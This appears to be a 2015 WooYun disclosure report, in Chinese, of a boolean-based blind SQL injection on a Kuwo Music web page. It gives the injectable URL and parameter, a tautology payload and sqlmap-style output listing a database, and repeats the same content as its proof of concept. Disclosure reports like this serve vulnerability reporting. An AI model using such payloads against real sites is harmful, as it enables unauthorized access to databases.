酷我音乐某处布尔型盲注

编号132811
Urlhttp://www.wooyun.org/bug.php?action=view&id=132811
漏洞状态厂商已经确认
漏洞标题酷我音乐某处布尔型盲注
漏洞类型SQL注射漏洞
厂商酷我音乐
白帽子路人甲
提交日期2015-08-09 18:25:00
公开日期2015-09-24 10:00:00
修复时间(not set)
确认时间2015-08-10 00:00:00
Confirm Spend1
漏洞标签php注射
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank6
漏洞简介
中国好声音,都第四季了
漏洞细节

注入点:

http://h.kuwo.cn/hsy/hz/wdj/zhibotest.jsp?id=26


加单引号报错,看到查询语句

1.png


跑起

---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 9119=9119
---
available databases [1]:
[*] EDITOR


user

[email protected]


盲注跑表太慢,到此为止!

POC

注入点:

http://h.kuwo.cn/hsy/hz/wdj/zhibotest.jsp?id=26


加单引号报错,看到查询语句

1.png


跑起

---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 9119=9119
---
available databases [1]:
[*] EDITOR


user

[email protected]


盲注跑表太慢,到此为止!

修复方案

有礼物吗

状态信息 2015-08-09: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开
厂商回复感谢对酷我的支持
回应信息危害等级:中漏洞Rank:6 确认时间:2015-08-10 09:59
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

shit。。。。

Me_Fortune02015-08-09 23:40:00